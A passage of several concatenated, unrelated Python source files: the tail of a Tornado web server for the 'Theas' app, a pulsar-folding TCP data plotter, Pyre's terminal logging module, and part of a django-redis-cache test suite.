G_program_options.define("remember_user_token",
default=REMEMBER_USER_TOKEN,
help="Save the user token in a cookie, and automatically log user in on future visits.",
type=bool)
G_program_options.define("default_resource_code",
default=DEFAULT_RESOURCE_CODE,
help="Resource code to use when a resource is not specified (i.e. like index.htm)",
type=str)
G_program_options.define("full_sql_is_ok_check",
default=FULL_SQL_IS_OK_CHECK,
help="Explicitly test SQL connection before each call.",
type=bool)
G_program_options.define("force_redir_after_post",
default=FORCE_REDIR_AFTER_POST,
help="After a POST, perform a redirect even if no update was requested.",
type=bool)
G_program_options.define("use_secure_cookies",
default=USE_SECURE_COOKIES,
help="When storing session and user tokens in cookies, use secure cookies.",
type=bool)
G_program_options.define("session_header_name",
default=SESSION_HEADER_NAME,
help="Name of HTTP header used to send session token.)",
type=str)
G_program_options.define("session_cookie_name",
default=SESSION_COOKIE_NAME,
help="Name of cookie used to store session token.)",
type=str)
G_program_options.define("user_cookie_name",
default=USER_COOKIE_NAME,
help="Name of cookie used to store user token (if applicable).",
type=str)
G_program_options.define("use_worker_threads",
default=USE_WORKER_THREADS,
help="Indicates if individual requests should be processed in their own thread.",
type=bool)
G_program_options.define("max_worker_threads",
default=MAX_WORKERS,
help="If use_worker_threads is true, indicates the maximum number of worker threads allowed.",
type=int)
G_program_options.parse_command_line()
msg = 'Theas app: trying to use configuration from {}'.format(G_program_options.settings_path + 'settings.cfg')
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
try:
if G_program_options.sql_server is None:
tornado.options.parse_config_file(G_program_options.settings_path + 'settings.cfg')
except Exception as e:
msg = 'Theas app: error processing settings.cfg file in {} {}'.format(
G_program_options.settings_path + 'settings.cfg',
e)
if LOGGING_LEVEL:
print(msg)
write_winlog(msg)
if G_program_options.sql_server is None:
tornado.options.print_help()
sys.exit()
# Now we have settings set in G_program_options elements.
# Some of these used a hard-coded constant as the default. (For example, we don't want to have hard-coded
# constants for credentials, and we don't need them for certain other values that are retrieved only
# once in our code. But other non-sensitive settings, a constant is used.)
# But these values could have been changed by settings in the config file.
# In our code we can directly use G_program_options.xxx to access the configured values. But for readability
# (and possibly other reasons) in some cases we prefer to access the global constants directly. So we now
# want to update the value of the global constants based on what has been configured.
SESSION_MAX_IDLE = G_program_options.session_max_idle_minutes
REMOVE_EXPIRED_THREAD_SLEEP = G_program_options.session_expired_poll_seconds
LOGGING_LEVEL = int(G_program_options.logging_level)
LOGIN_RESOURCE_CODE = G_program_options.login_resource_code
LOGIN_AUTO_USER_TOKEN = G_program_options.login_auto_user_token
REMEMBER_USER_TOKEN = G_program_options.remember_user_token
DEFAULT_RESOURCE_CODE = G_program_options.default_resource_code
FULL_SQL_IS_OK_CHECK = G_program_options.full_sql_is_ok_check
FORCE_REDIR_AFTER_POST = G_program_options.force_redir_after_post
USE_SECURE_COOKIES = G_program_options.use_secure_cookies
SESSION_HEADER_NAME = G_program_options.session_header_name
SESSION_COOKIE_NAME = G_program_options.session_cookie_name
USER_COOKIE_NAME = G_program_options.user_cookie_name
USE_WORKER_THREADS = G_program_options.use_worker_threads
MAX_WORKERS = G_program_options.max_worker_threads
msg = 'Starting Theas server {} (in {}) on port {}.'.format(
program_filename, program_directory, G_program_options.port)
print(msg)
write_winlog(msg)
if not LOGGING_LEVEL:
print("Note: Logging is disabled")
global G_cached_resources
G_cached_resources = ThCachedResources() # Global list of cached resources
try:
G_cached_resources.load_global_resources()
except Exception as e:
msg = 'Theas app: error global cached resources when calling G_cached_resources.load_global_resources(): {}'.format(
e)
print(msg)
write_winlog(msg)
sys.exit()
G_sessions = ThSessions() # Global list of sessions
_mssql.set_max_connections(G_program_options.sql_max_connections)
if run_as_svc:
# make sure there is an ioloop in this thread (needed for Windows service)
io_loop = tornado.ioloop.IOLoop()
io_loop.make_current()
application = tornado.web.Application([
(r'/attach', ThHandler_Attach),
(r'/attach/(.*)', ThHandler_Attach),
(r'/logout', ThHandler_Logout),
(r'/login', ThHandler_Login),
(r'/back', ThHandler_Back),
(r'/purgecache', ThHandler_PurgeCache),
(r'/test', TestThreadedHandler),
(r'/testws', ThWSHandler_Test),
(r'/async', ThHandler_Async),
(r'/async/(.*)', ThHandler_Async),
(r'/(.*)', ThHandler)
# note that /r/* has special meaning, though it is handled by ThHandler. When /r/resourcecode/param1/param2
# is specified, this indicates that the resource code is "resourcecode". "param1/param2" will be passed
# in to @PathParams in the stored procedure.
],
debug=False,
autoreload=False,
xsrf_cookies=True,
cookie_secret=COOKIE_SECRET)
http_server = tornado.httpserver.HTTPServer(application)
try:
http_server.listen(G_program_options.port)
except Exception as e:
msg = 'Theas app: Could not start HTTP server on port {}. Is something else already running on that port? {}'.format(
G_program_options.port, e)
print(msg)
write_winlog(msg)
sys.exit()
G_server_is_running = True
# disable Tornado's built-in logging to stderr
# see: http://stackoverflow.com/questions/21234772/python-tornado-disable-logging-to-stderr
logging.getLogger('tornado.access').disabled = True
G_sessions.start_cleanup_thread()
tornado.ioloop.PeriodicCallback(do_periodic_callback, 2000).start()
tornado.ioloop.IOLoop.instance().start()
# all_objects = muppy.get_objects()
# sum1 = summary.summarize(all_objects)
# summary.print_(sum1)
# tornado.ioloop.IOLoop.current().close()
# tornado.ioloop.IOLoop.instance().close()
msg = 'Shutting down...Exited IOLoop'
ThSession.cls_log('Shutdown', msg)
write_winlog(msg)
# ioloop = tornado.ioloop.IOLoop.current()
# ioloop.add_callback(ioloop.stop)
http_server.stop()
# ThHandler.executor.shutdown()
# ThSession.cls_log('Shutdown', 'Winding down #1')
# ThHandler_Attach.executor.shutdown()
# ThSession.cls_log('Shutdown', 'Winding down #2')
# TestThreadedHandler.executor.shutdown()
# ThSession.cls_log('Shutdown', 'Winding down #3')
http_server = None
del http_server
G_cached_resources = None
ThSession.cls_log('Shutdown', 'Winding down #4')
G_sessions.stop()
# ThSessions.remove_all_sessions()
G_sessions = None
ThSession.cls_log('Shutdown', 'Winding down #5')
if G_break_handler:
G_break_handler.disable()
msg = 'Stopped Theas server {} (in {}) on port {}.'.format(
program_filename, program_directory, G_program_options.port)
print(msg)
write_winlog(msg)
if __name__ == "__main__":
try:
# all_objects = muppy.get_objects()
# sum1 = summary.summarize(all_objects)
# summary.print_(sum1)
# gc.set_debug(gc.DEBUG_UNCOLLECTABLE | gc.DEBUG_SAVEALL)
# set_exit_handler(on_exit)
run()
ThSession.cls_log('Shutdown', 'Application has ended')
# all_objects = muppy.get_objects()
# sum1 = summary.summarize(all_objects)
# summary.print_(sum1)
# os.kill(0, signal.CTRL_BREAK_EVENT)
finally:
pass
# Clean up _mssql resources
# _mssql.exit_mssql()
|
pyPeekTCP_fold_2pol.py
|
# === Start Python 2/3 compatibility
from __future__ import absolute_import, division, print_function, unicode_literals
from future.builtins import * # noqa pylint: disable=W0401, W0614
from future.builtins.disabled import * # noqa pylint: disable=W0401, W0614
# === End Python 2/3 compatibility
from future import standard_library
standard_library.install_aliases()
import time
import threading
import socket
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import matplotlib.dates as md
import datetime
import struct
import json
target = "B1133+16"
# struct IntensityHeader {
# int packet_length; // - packet length
# int header_length; // - header length
# int samples_per_packet; // - number of samples in packet (or dimensions, n_freq x n_time x n_stream?)
# int sample_type; // - data type of samples in packet
# double raw_cadence; // - raw sample cadence
# int num_freqs; // - freq list / map
# int samples_summed; // - samples summed for each datum
# uint handshake_idx; // - frame idx at handshake
# double handshake_utc; // - UTC time at handshake
# char stokes_type; // - description of stream (e.g. V / H pol, Stokes-I / Q / U / V)
# // -8 -7 -6 -5 -4 -3 -2 -1 1 2 3 4
# // YX XY YY XX LR RL LL RR I Q U V
# };
header_fmt = "=iiiidiiiId"
stokes_lookup = ["YX", "XY", "YY", "XX", "LR", "RL", "LL", "RR", "I", "Q", "U", "V"]
TCP_IP = "0.0.0.0"
TCP_PORT = 2054
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.bind((TCP_IP, TCP_PORT))
sock.listen(1)
psrcat = json.load(open("psrcat/psrcat_b.json"))["pulsars"]
psrdata = psrcat[target]
def updatefig(*args):
global waterfall, times, medsub, colorscale
tmin = md.date2num(datetime.datetime.fromtimestamp(np.amin(times)))
tmax = md.date2num(datetime.datetime.fromtimestamp(np.amax(times)))
for i in np.arange(pkt_elems):
if medsub:
p[i].set_data(
waterfall[:, :, i]
- np.nanmedian(waterfall[:, :, i], axis=0)[np.newaxis, :]
)
tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
p[pkt_elems + i].set_data(
tmpdata - np.median(tmpdata, axis=0)[np.newaxis, :]
)
else:
p[i].set_data(waterfall[:, :, i])
tmpdata = 10 * np.log10(waterfold[:, :, i] / countfold[:, :, i])
p[pkt_elems + i].set_data(tmpdata)
p[i].set_extent([freqlist[0, 0], freqlist[-1, -1], tmin, tmax])
p[i].set_clim(vmin=colorscale[0], vmax=colorscale[1])
p[pkt_elems + i].set_clim(vmin=colorscale[0] / 10, vmax=colorscale[1] / 10)
return (p,)
def receive(connection, length):
chunks = []
bytes_recd = 0
while bytes_recd < length:
chunk = connection.recv(min(length - bytes_recd, 2048))
if chunk == b"":
raise RuntimeError("socket connection broken")
chunks.append(chunk)
bytes_recd = bytes_recd + len(chunk)
return b"".join(chunks)
connection, client_address = sock.accept()
packed_header = receive(connection, 48)
print(len(packed_header), packed_header)
tcp_header = struct.unpack(header_fmt, packed_header)
pkt_length = tcp_header[0] # packet_length
pkt_header = tcp_header[1] # header_length
pkt_samples = tcp_header[2] # samples_per_packet
pkt_dtype = tcp_header[3] # sample_type
pkt_raw_cad = tcp_header[4] # raw_cadence
pkt_freqs = tcp_header[5] # num_freqs
pkt_elems = tcp_header[6] # num_freqs
pkt_int_len = tcp_header[7] # samples_summed
pkt_idx0 = tcp_header[8] # handshake_idx
pkt_utc0 = tcp_header[9] # handshake_utc
print(tcp_header)
sec_per_pkt_frame = pkt_raw_cad * pkt_int_len
info_header = receive(connection, pkt_freqs * 4 * 2 + pkt_elems * 1)
freqlist = np.fromstring(info_header[: pkt_freqs * 4 * 2], dtype=np.float32).reshape(
-1, 2
) # .mean(axis=1)
freqlist = freqlist / 1e6
elemlist = np.fromstring(info_header[pkt_freqs * 4 * 2 :], dtype=np.int8)
plot_freqs = pkt_freqs / 8
# freqlist = freqlist.reshape(-1,plot_freqs).mean(axis=1)
plot_times = 256 * 2
plot_phase = 128
total_integration = 1024 * 4
if pkt_int_len > total_integration:
print("Pre-integrated to longer than desired time!")
print("{} vs {}".format(pkt_int_len, total_integration))
print("Resetting integration length to {}".format(pkt_int_len))
total_integration = pkt_int_len
local_integration = total_integration // pkt_int_len
waterfall = np.zeros((plot_times, plot_freqs, pkt_elems), dtype=np.float32) + np.nan
countfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
fold_period = 1.0 / psrdata["frequency"]
waterfold = np.zeros((plot_phase, plot_freqs, pkt_elems), dtype=np.float32)
times = np.zeros(plot_times)
def data_listener():
global waterfall, waterfold, countfold
global times, total_integration
last_idx = pkt_idx0
data_pkt_frame_idx = 0
data_pkt_samples_summed = 1
idx = 0
while True:
d = np.zeros([pkt_freqs, pkt_elems])
n = np.zeros([pkt_freqs, pkt_elems])
t = np.zeros(plot_times)
waterfold *= 0.999
countfold *= 0.999
for _ in np.arange(local_integration * pkt_elems):
data = receive(connection, pkt_length + pkt_header)
if len(data) != pkt_length + pkt_header:
print("Lost Connection!")
connection.close()
return
(
data_pkt_frame_idx,
data_pkt_elem_idx,
data_pkt_samples_summed,
) = struct.unpack("III", data[:pkt_header])
d[:, data_pkt_elem_idx] += (
np.fromstring(data[pkt_header:], dtype=np.uint32) * 1.0
)
n[:, data_pkt_elem_idx] += data_pkt_samples_summed * 1.0
fold_idx = np.array(
(
(sec_per_pkt_frame * data_pkt_frame_idx + 0.5 * fold_period)
% fold_period
)
/ fold_period
* plot_phase,
dtype=np.int32,
)
waterfold[fold_idx, :, data_pkt_elem_idx] += (
np.fromstring(data[pkt_header:], dtype=np.uint32)
.reshape(-1, pkt_freqs // plot_freqs)
.mean(axis=1)
)
countfold[fold_idx, :, data_pkt_elem_idx] += data_pkt_samples_summed
roll_idx = (data_pkt_frame_idx - last_idx) // local_integration
times = np.roll(times, roll_idx)
times[0] = sec_per_pkt_frame * (data_pkt_frame_idx - pkt_idx0) + pkt_utc0
# print(d,n)
waterfall = np.roll(waterfall, roll_idx, axis=0)
waterfall[0, :, :] = 10 * np.log10(
(d / n).reshape(-1, pkt_freqs // plot_freqs, pkt_elems).mean(axis=1)
)
if np.mean(n) != total_integration:
print(np.mean(n), np.std(n))
last_idx = data_pkt_frame_idx
thread = threading.Thread(target=data_listener)
thread.daemon = True
thread.start()
time.sleep(1)
f, ax = plt.subplots(2, pkt_elems, gridspec_kw={"height_ratios": [2, 1]})
f.subplots_adjust(right=0.8)
if pkt_elems == 1:
ax = [ax]
plt.ioff()
p = []
tmin = md.date2num(
datetime.datetime.fromtimestamp(
pkt_utc0 - plot_times * local_integration * sec_per_pkt_frame
)
)
tmax = md.date2num(datetime.datetime.fromtimestamp(pkt_utc0))
times = pkt_utc0 - np.arange(plot_times) * local_integration * sec_per_pkt_frame
date_format = md.DateFormatter("%H:%M:%S")
medsub = True
colorscale = [-0.5, 0.5]
for i in np.arange(pkt_elems):
p.append(
ax[0, i].imshow(
waterfall[:, :, i],
aspect="auto",
animated=True,
origin="upper",
interpolation="nearest",
cmap="gray",
vmin=colorscale[0],
vmax=colorscale[1],
extent=[freqlist[0, 0], freqlist[-1, -1], tmin, tmax],
)
)
ax[0, i].set_yticklabels([])
ax[0, i].yaxis_date()
ax[0, 0].set_title(stokes_lookup[elemlist[0] + 8])
ax[0, 1].set_title(stokes_lookup[elemlist[1] + 8])
ax[0, 0].set_ylabel("Local Time")
ax[0, 0].yaxis_date()
ax[0, 0].yaxis.set_major_formatter(date_format)
for i in np.arange(pkt_elems):
p.append(
ax[1, i].imshow(
waterfold[:, :, i],
aspect="auto",
animated=True,
origin="upper",
interpolation="nearest",
cmap="gray",
vmin=colorscale[0],
vmax=colorscale[1],
extent=[freqlist[0, 0], freqlist[-1, -1], 0, 1],
)
)
ax[1, i].set_xlabel("Freq (MHz)")
ax[1, 0].set_ylabel("Pulse Phase")
cbar_ax = f.add_axes([0.85, 0.15, 0.05, 0.7])
c = f.colorbar(p[0], cax=cbar_ax)
c.set_label("Power (dB, arbitrary)")
from matplotlib.widgets import Button
rax = plt.axes([0.82, 0.03, 0.15, 0.04])
check = Button(rax, "Med Subtract")
def func(event):
global medsub, check, colorscale
medsub = not medsub
if medsub:
check.label.set_text("Med Subtracted")
colorscale = [-0.5, 0.5]
else:
check.label.set_text("Raw Power")
colorscale = [-10, 10]
check.on_clicked(func)
ani = animation.FuncAnimation(f, updatefig, frames=100, interval=100)
f.show()
|
log.py
|
# Copyright (c) 2016-present, Facebook, Inc.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
# pyre-strict
import argparse
import copy
import io
import logging
import os
import re
import sys
import threading
import time
from typing import List, Optional, Sequence # noqa
LOG = logging.getLogger(__name__) # type: logging.Logger
PERFORMANCE = 15 # type: int
PROMPT = 50 # type: int
SUCCESS = 60 # type: int
stdout = io.StringIO(newline="") # type: io.StringIO
class Color:
YELLOW = "\033[33m" # type: str
RED = "\033[31m" # type: str
class Format:
BOLD = "\033[1m" # type: str
CLEAR_LINE = "\x1b[0G\x1b[K" # type: str
CLEAR = "\033[0m" # type: str
TRUNCATE_OVERFLOW = "\033[?7l" # type: str
WRAP_OVERFLOW = "\033[?7h" # type: str
NEWLINE = "\n" # type: str
CURSOR_UP_LINE = "\x1b[1A" # type: str
HIDE_CURSOR = "\x1b[?25l" # type: str
SHOW_CURSOR = "\x1b[?25h" # type: str
class Character:
LAMBDA = "ƛ" # type: str
class SectionFormatter(logging.Formatter):
def __init__(self) -> None:
super(SectionFormatter, self).__init__("%(asctime)s %(levelname)s %(message)s")
def format(self, record: logging.LogRecord) -> str:
formatted = super(SectionFormatter, self).format(record)
return re.sub(r"DEBUG \[(.*)\]", r"\1", formatted)
class TimedStreamHandler(logging.StreamHandler):
THRESHOLD = 0.5 # type: float
LINE_BREAKING_LEVELS = ["ERROR", "WARNING", "SUCCESS"] # type: Sequence[str]
_terminate = False # type: bool
_last_update = 0.0 # type: float
def __init__(self) -> None:
super(TimedStreamHandler, self).__init__()
self.setFormatter(logging.Formatter("%(message)s"))
self.terminator = "" # type: str
self.setLevel(logging.INFO)
self._record = None # type: Optional[logging.LogRecord]
self._last_record = None # type: Optional[logging.LogRecord]
self._active_lines = 0 # type: int
# Preamble preparing terminal.
sys.stderr.write(
Format.NEWLINE
+ Format.TRUNCATE_OVERFLOW
+ Format.CLEAR_LINE
+ Format.CURSOR_UP_LINE
+ Format.HIDE_CURSOR
)
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def clear_lines(self) -> str:
if self._active_lines == 0:
return ""
return Format.CLEAR_LINE + "".join(
[
Format.CURSOR_UP_LINE + Format.CLEAR_LINE
for n in range(self._active_lines - 1)
]
)
def emit(self, record: logging.LogRecord, age: Optional[float] = None) -> None:
self._last_record = record
suffix = ""
color = ""
active_lines = record.msg.count("\n") + 1
if record.levelname in self.LINE_BREAKING_LEVELS:
record.msg += "\n"
if record.levelname == "ERROR":
color = Color.RED
self._record = None
active_lines = 0
elif record.levelname == "WARNING":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "PROMPT":
color = Color.YELLOW
self._record = None
active_lines = 0
elif record.levelname == "SUCCESS":
self._record = None
active_lines = 0
elif age:
if age > 10:
color = Color.YELLOW
if age > 30:
color = Color.RED
suffix = " {}[{:.1f}s]{}".format(
color if color else "", age, Format.CLEAR if color else ""
)
else:
self._record = record
self._last_update = time.time()
timed_record = copy.copy(record)
timed_record.msg = (
"{clear_line}{color} {cursor}{clear} " "{message}{suffix}"
).format(
clear_line=self.clear_lines(),
color=color,
cursor=Character.LAMBDA,
clear=Format.CLEAR,
message=record.msg,
suffix=suffix,
)
self._active_lines = active_lines
super(TimedStreamHandler, self).emit(timed_record)
def _thread(self) -> None:
while not self._terminate:
if self._record:
age = time.time() - self._last_update
if age > self.THRESHOLD:
self.emit(self._record, age)
time.sleep(0.1)
def terminate(self) -> None:
last_record = self._last_record
if last_record and last_record.levelname not in self.LINE_BREAKING_LEVELS:
sys.stderr.write("\n")
# Reset terminal.
sys.stderr.write(Format.WRAP_OVERFLOW + Format.SHOW_CURSOR)
sys.stderr.flush()
self._terminate = True
def initialize(arguments: argparse.Namespace) -> None:
if arguments.noninteractive:
stream_handler = logging.StreamHandler()
stream_handler.setFormatter(SectionFormatter())
stream_handler.setLevel(logging.DEBUG)
arguments.timed_stream_handler = None
else:
stream_handler = TimedStreamHandler()
arguments.timed_stream_handler = stream_handler
handlers = [stream_handler] # type: List[logging.Handler]
if not arguments.noninteractive:
try:
os.mkdir(".pyre")
except FileExistsError:
pass
file_handler = logging.FileHandler(".pyre/pyre.stderr")
file_handler.setFormatter(SectionFormatter())
file_handler.setLevel(logging.DEBUG)
handlers.append(file_handler)
logging.addLevelName(PERFORMANCE, "PERFORMANCE")
logging.addLevelName(PROMPT, "PROMPT")
logging.addLevelName(SUCCESS, "SUCCESS")
logging.basicConfig(level=logging.DEBUG, handlers=handlers)
def cleanup(arguments: argparse.Namespace) -> None:
if arguments.timed_stream_handler:
arguments.timed_stream_handler.terminate()
output = stdout.getvalue()
if output:
sys.stdout.write(output + "\n")
class Buffer:
THRESHOLD = 0.1 # type: float
_flushed = False # type: bool
def __init__(self, section: str, data: List[str]) -> None:
self._section = section # type: str
self._data = data # type: List[str]
self._lock = threading.RLock() # type: threading.RLock
thread = threading.Thread(target=self._thread)
thread.daemon = True
thread.start()
def append(self, line: str) -> None:
self._data.append(line)
def flush(self) -> None:
with self._lock:
if self._flushed is True:
return
self._flushed = True
message = "\n".join(self._data)
if self._section == "ERROR":
LOG.error(message)
elif self._section == "INFO":
LOG.info(message)
elif self._section == "WARNING":
LOG.warning(message)
elif self._section == "PROGRESS":
LOG.info(message)
elif self._section == "PARSER":
LOG.error(message)
else:
LOG.debug("[%s] %s", self._section, message)
def _thread(self) -> None:
time.sleep(self.THRESHOLD)
with self._lock:
if not self._flushed:
self.flush()
def get_yes_no_input(prompt: str) -> bool:
choice = get_input(prompt, suffix=" [Y/n] ")
return choice.lower() in ["", "y", "ye", "yes"]
def get_optional_input(prompt: str, default: str) -> str:
result = get_input(prompt, suffix=" (Default: `{}`): ".format(default))
if result == "":
return default
return result
def get_input(prompt: str, suffix: str = "") -> str:
LOG.log(PROMPT, prompt + suffix)
return input().strip()
|
base_tests.py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from hashlib import sha1
import os
import subprocess
import threading
import time
try:
import cPickle as pickle
except ImportError:
import pickle
from django.core.cache import caches
from django.core.exceptions import ImproperlyConfigured
from django.test import TestCase, override_settings
from django.utils.encoding import force_bytes
import redis
from tests.testapp.models import Poll, expensive_calculation
from redis_cache.cache import RedisCache, pool
from redis_cache.constants import KEY_EXPIRED, KEY_NON_VOLATILE
from redis_cache.utils import get_servers, parse_connection_kwargs
REDIS_PASSWORD = 'yadayada'
LOCATION = "127.0.0.1:6381"
# functions/classes for complex data type tests
def f():
return 42
class C:
def m(n):
return 24
def start_redis_servers(servers, db=None, master=None):
"""Creates redis instances using specified locations from the settings.
Returns list of Popen objects
"""
processes = []
devnull = open(os.devnull, 'w')
master_connection_kwargs = master and parse_connection_kwargs(
master,
db=db,
password=REDIS_PASSWORD
)
for i, server in enumerate(servers):
connection_kwargs = parse_connection_kwargs(
server,
db=db,
password=REDIS_PASSWORD, # will be overridden if specified in `server`
)
parameters = dict(
port=connection_kwargs.get('port', 0),
requirepass=connection_kwargs['password'],
)
is_socket = server.startswith('unix://') or server.startswith('/')
if is_socket:
parameters.update(
port=0,
unixsocket='/tmp/redis{0}.sock'.format(i),
unixsocketperm=755,
)
if master and not connection_kwargs == master_connection_kwargs:
parameters.update(
masterauth=master_connection_kwargs['password'],
slaveof="{host} {port}".format(
host=master_connection_kwargs['host'],
port=master_connection_kwargs['port'],
)
)
args = ['./redis/src/redis-server'] + [
"--{parameter} {value}".format(parameter=parameter, value=value)
for parameter, value in parameters.items()
]
p = subprocess.Popen(args, stdout=devnull)
processes.append(p)
return processes
class SetupMixin(object):
processes = None
@classmethod
def tearDownClass(cls):
for p in cls.processes:
p.kill()
cls.processes = None
# Give redis processes some time to shutdown
# time.sleep(.1)
def setUp(self):
if self.__class__.processes is None:
from django.conf import settings
cache_settings = settings.CACHES['default']
servers = get_servers(cache_settings['LOCATION'])
options = cache_settings.get('OPTIONS', {})
db = options.get('db', 0)
master = options.get('MASTER_CACHE')
self.__class__.processes = start_redis_servers(
servers,
db=db,
master=master
)
# Give redis processes some time to startup
time.sleep(.1)
self.reset_pool()
self.cache = self.get_cache()
def tearDown(self):
# clear caches to allow @override_settings(CACHES=...) to work.
caches._caches.caches = {}
# Sometimes it will be necessary to skip this method because we need to
# test default initialization and that may be using a different port
# than the test redis server.
if hasattr(self, '_skip_tearDown') and self._skip_tearDown:
self._skip_tearDown = False
return
self.cache.clear()
def reset_pool(self):
pool.reset()
def get_cache(self, backend=None):
return caches[backend or 'default']
class BaseRedisTestCase(SetupMixin):
def test_simple(self):
# Simple cache set/get works
self.cache.set("key", "value")
self.assertEqual(self.cache.get("key"), "value")
def test_add(self):
# A key can be added to a cache
self.cache.add("addkey1", "value")
result = self.cache.add("addkey1", "newvalue")
self.assertFalse(result)
self.assertEqual(self.cache.get("addkey1"), "value")
def test_non_existent(self):
# Non-existent cache keys return as None/default
# get with non-existent keys
self.assertIsNone(self.cache.get("does_not_exist"))
self.assertEqual(self.cache.get("does_not_exist", "bang!"), "bang!")
def test_get_many(self):
# Multiple cache keys can be returned using get_many
self.cache.set('a', 'a')
self.cache.set('b', 'b')
self.cache.set('c', 'c')
self.cache.set('d', 'd')
self.assertEqual(self.cache.get_many(['a', 'c', 'd']), {'a': 'a', 'c': 'c', 'd': 'd'})
self.assertEqual(self.cache.get_many(['a', 'b', 'e']), {'a': 'a', 'b': 'b'})
def test_get_many_works_with_empty_keys_array(self):
self.assertEqual(self.cache.get_many([]), {})
def test_get_many_with_manual_integer_insertion(self):
keys = ['a', 'b', 'c', 'd']
for i, key in enumerate(keys):
self.cache.set(key, i)
self.assertEqual(self.cache.get_many(keys), {'a': 0, 'b': 1, 'c': 2, 'd': 3})
def test_get_many_with_automatic_integer_insertion(self):
keys = ['a', 'b', 'c', 'd']
for i, key in enumerate(keys):
self.cache.set(key, i)
self.assertEqual(self.cache.get_many(keys), {'a': 0, 'b': 1, 'c': 2, 'd': 3})
def test_delete(self):
# Cache keys can be deleted
self.cache.set("key1", "spam")
self.cache.set("key2", "eggs")
self.assertEqual(self.cache.get("key1"), "spam")
self.cache.delete("key1")
self.assertIsNone(self.cache.get("key1"))
self.assertEqual(self.cache.get("key2"), "eggs")
def test_has_key(self):
# The cache can be inspected for cache keys
self.cache.set("hello1", "goodbye1")
self.assertIn("hello1", self.cache)
self.assertNotIn("goodbye1", self.cache)
def test_in(self):
# The in operator can be used to inspet cache contents
self.cache.set("hello2", "goodbye2")
self.assertIn("hello2", self.cache)
self.assertNotIn("goodbye2", self.cache)
def test_incr(self):
# Cache values can be incremented
self.cache.set('answer', 41)
self.assertEqual(self.cache.get('answer'), 41)
self.assertEqual(self.cache.incr('answer'), 42)
self.assertEqual(self.cache.get('answer'), 42)
self.assertEqual(self.cache.incr('answer', 10), 52)
self.assertEqual(self.cache.get('answer'), 52)
self.assertRaises(ValueError, self.cache.incr, 'does_not_exist')
def test_decr(self):
# Cache values can be decremented
self.cache.set('answer', 43)
self.assertEqual(self.cache.decr('answer'), 42)
self.assertEqual(self.cache.get('answer'), 42)
self.assertEqual(self.cache.decr('answer', 10), 32)
self.assertEqual(self.cache.get('answer'), 32)
self.assertRaises(ValueError, self.cache.decr, 'does_not_exist')
def test_data_types(self):
# Many different data types can be cached
stuff = {
'string': 'this is a string',
'int': 42,
'list': [1, 2, 3, 4],
'tuple': (1, 2, 3, 4),
'dict': {'A': 1, 'B': 2},
'function': f,
'class': C,
}
self.cache.set("stuff", stuff)
self.assertEqual(self.cache.get("stuff"), stuff)
def test_cache_read_for_model_instance(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
my_poll = Poll.objects.create(question="Well?")
self.assertEqual(Poll.objects.count(), 1)
pub_date = my_poll.pub_date
self.cache.set('question', my_poll)
cached_poll = self.cache.get('question')
self.assertEqual(cached_poll.pub_date, pub_date)
# We only want the default expensive calculation run once
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_write_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache write
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.assertEqual(expensive_calculation.num_runs, 1)
self.cache.set('deferred_queryset', defer_qs)
# cache set should not re-evaluate default functions
self.assertEqual(expensive_calculation.num_runs, 1)
def test_cache_read_for_model_instance_with_deferred(self):
# Don't want fields with callable as default to be called on cache read
expensive_calculation.num_runs = 0
Poll.objects.all().delete()
Poll.objects.create(question="What?")
self.assertEqual(expensive_calculation.num_runs, 1)
defer_qs = Poll.objects.all().defer('question')
self.assertEqual(defer_qs.count(), 1)
self.cache.set('deferred_queryset', defer_qs)
self.assertEqual(expensive_calculation.num_runs, 1)
runs_before_cache_read = expensive_calculation.num_runs
self.cache.get('deferred_queryset')
# We only want the default expensive calculation run on creation and set
self.assertEqual(expensive_calculation.num_runs, runs_before_cache_read)
def test_expiration(self):
# Cache values can be set to expire
self.cache.set('expire1', 'very quickly', 1)
self.cache.set('expire2', 'very quickly', 1)
self.cache.set('expire3', 'very quickly', 1)
time.sleep(2)
self.assertEqual(self.cache.get("expire1"), None)
self.cache.add("expire2", "newvalue")
self.assertEqual(self.cache.get("expire2"), "newvalue")
self.assertEqual("expire3" in self.cache, False)
def test_set_expiration_timeout_None(self):
key, value = 'key', 'value'
self.cache.set(key, value, timeout=None)
self.assertIsNone(self.cache.ttl(key))
def test_set_expiration_timeout_zero(self):
key, value = self.cache.make_key('key'), 'value'
self.cache.set(key, value, timeout=0)
self.assertEqual(self.cache.get_client(key).ttl(key), KEY_EXPIRED)
self.assertNotIn(key, self.cache)
def test_set_expiration_timeout_negative(self):
key, value = self.cache.make_key('key'), 'value'
self.cache.set(key, value, timeout=-1)
self.assertNotIn(key, self.cache)
def test_unicode(self):
# Unicode values can be cached
stuff = {
'ascii': 'ascii_value',
'unicode_ascii': 'Iñtërnâtiônàlizætiøn1',
'Iñtërnâtiônàlizætiøn': 'Iñtërnâtiônàlizætiøn2',
'ascii': {'x': 1}
}
for (key, value) in stuff.items():
self.cache.set(key, value)
self.assertEqual(self.cache.get(key), value)
def test_binary_string(self):
# Binary strings should be cachable
from zlib import compress, decompress
value = b'value_to_be_compressed'
compressed_value = compress(value)
self.cache.set('binary1', compressed_value)
compressed_result = self.cache.get('binary1')
self.assertEqual(compressed_value, compressed_result)
self.assertEqual(value, decompress(compressed_result))
def test_set_many(self):
# Multiple keys can be set using set_many
self.cache.set_many({"key1": "spam", "key2": "eggs"})
self.assertEqual(self.cache.get("key1"), "spam")
self.assertEqual(self.cache.get("key2"), "eggs")
def test_set_many_works_with_empty_dict(self):
# This test passes if no exception is raised
self.cache.set_many({})
self.cache.set_many({}, version=2)
def test_set_many_expiration(self):
# set_many takes a second ``timeout`` parameter
